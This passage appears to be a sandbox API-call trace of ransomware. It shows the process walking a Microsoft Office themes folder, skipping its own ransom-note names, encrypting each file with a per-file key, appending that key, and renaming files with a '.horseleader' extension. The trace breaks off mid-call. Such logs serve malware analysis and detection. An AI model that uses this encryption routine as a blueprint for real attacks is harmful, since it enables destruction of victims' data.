[0248.165] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SUMIPNTG", cAlternateFileName="")) returned 1 [0248.165] lstrcmpiW (lpString1="SUMIPNTG", lpString2="Windows") returned -1 [0248.165] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG") returned 68 [0248.165] lstrcmpW (lpString1="SUMIPNTG", lpString2=".") returned 1 [0248.165] lstrcmpW (lpString1="SUMIPNTG", lpString2="..") returned 1 [0248.165] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.166] GetProcessHeap () returned 0x780000 [0248.166] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.166] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*") returned 70 [0248.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.166] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.166] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\.") returned 70 [0248.166] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.166] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d416d30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.166] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.166] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\..") returned 71 [0248.166] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0248.166] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.166] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x137f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.166] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.167] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 80 [0248.167] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.168] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.168] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.168] lstrlenW (lpString=".testttjffg") returned 11 [0248.168] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.168] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.168] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.168] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.169] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 80 [0248.169] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.169] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=4991) returned 1 [0248.169] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x137f, lpOverlapped=0x0) returned 1 [0248.171] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffec81, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.171] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x137f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x137f, lpOverlapped=0x0) returned 1 [0248.171] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.172] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.172] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.172] CloseHandle (hObject=0x1a4) returned 1 [0248.172] GetProcessHeap () returned 0x780000 [0248.172] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.172] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.horseleader") returned 92 [0248.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.horseleader")) returned 1 [0248.176] GetProcessHeap () returned 0x780000 [0248.176] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.176] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7a6700, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2f7a6700, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x19e14, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SUMIPNTG.ELM", cAlternateFileName="")) returned 1 [0248.177] lstrcmpiW (lpString1="SUMIPNTG.ELM", lpString2="Windows") returned -1 [0248.177] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM") returned 81 [0248.177] StrStrIW (lpFirst="SUMIPNTG.ELM", lpSrch=".horseleader") returned 0x0 [0248.177] lstrcmpW (lpString1="SUMIPNTG.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.177] lstrcmpW (lpString1="SUMIPNTG.ELM", lpString2="_uninstalling_.png") returned 1 [0248.177] lstrlenW (lpString=".testttjffg") returned 11 [0248.177] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM", lpSrch=".testttjffg") returned 0x0 [0248.177] CryptGenRandom 
(in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.177] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.177] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.178] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM") returned 81 [0248.178] StrStrW (lpFirst="SUMIPNTG.ELM", lpSrch=".txt") returned 0x0 [0248.178] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=106004) returned 1 [0248.179] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.179] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.181] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.181] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.182] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa70a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.182] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.183] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.183] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.183] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14e14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.183] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.183] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.184] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.184] 
CloseHandle (hObject=0x1a4) returned 1 [0248.184] GetProcessHeap () returned 0x780000 [0248.184] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.184] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM.horseleader") returned 93 [0248.184] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.elm.horseleader")) returned 1 [0248.187] GetProcessHeap () returned 0x780000 [0248.187] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.187] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SUMIPNTG.INF", cAlternateFileName="")) returned 1 [0248.187] lstrcmpiW (lpString1="SUMIPNTG.INF", lpString2="Windows") returned -1 [0248.187] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF") returned 81 [0248.187] StrStrIW (lpFirst="SUMIPNTG.INF", lpSrch=".horseleader") returned 0x0 [0248.187] lstrcmpW (lpString1="SUMIPNTG.INF", lpString2="#Decrypt#.txt") returned 1 [0248.187] 
lstrcmpW (lpString1="SUMIPNTG.INF", lpString2="_uninstalling_.png") returned 1 [0248.187] lstrlenW (lpString=".testttjffg") returned 11 [0248.187] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF", lpSrch=".testttjffg") returned 0x0 [0248.187] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.188] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.188] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF") returned 81 [0248.188] StrStrW (lpFirst="SUMIPNTG.INF", lpSrch=".txt") returned 0x0 [0248.188] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=555) returned 1 [0248.189] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x22b, lpOverlapped=0x0) returned 1 [0248.191] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.191] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x22b, lpOverlapped=0x0) returned 1 [0248.192] SetFilePointerEx (in: hFile=0x1a4, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.192] CloseHandle (hObject=0x1a4) returned 1 [0248.192] GetProcessHeap () returned 0x780000 [0248.192] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.192] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF.horseleader") returned 93 [0248.192] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.inf.horseleader")) returned 1 [0248.196] GetProcessHeap () returned 0x780000 [0248.196] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.196] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, 
nFileSizeLow=0xad0e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.196] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.196] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 81 [0248.196] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.196] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.197] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.197] lstrlenW (lpString=".testttjffg") returned 11 [0248.197] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.197] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.197] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.197] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 81 [0248.198] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.198] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=44302) returned 1 [0248.198] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.207] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.208] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.208] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.209] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.209] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.209] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xd0e, lpOverlapped=0x0) returned 1 [0248.209] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff2f2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.210] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xd0e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xd0e, lpOverlapped=0x0) returned 1 [0248.210] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.210] WriteFile (in: 
hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.210] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.210] CloseHandle (hObject=0x1a4) returned 1 [0248.210] GetProcessHeap () returned 0x780000 [0248.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.211] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.horseleader") returned 93 [0248.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 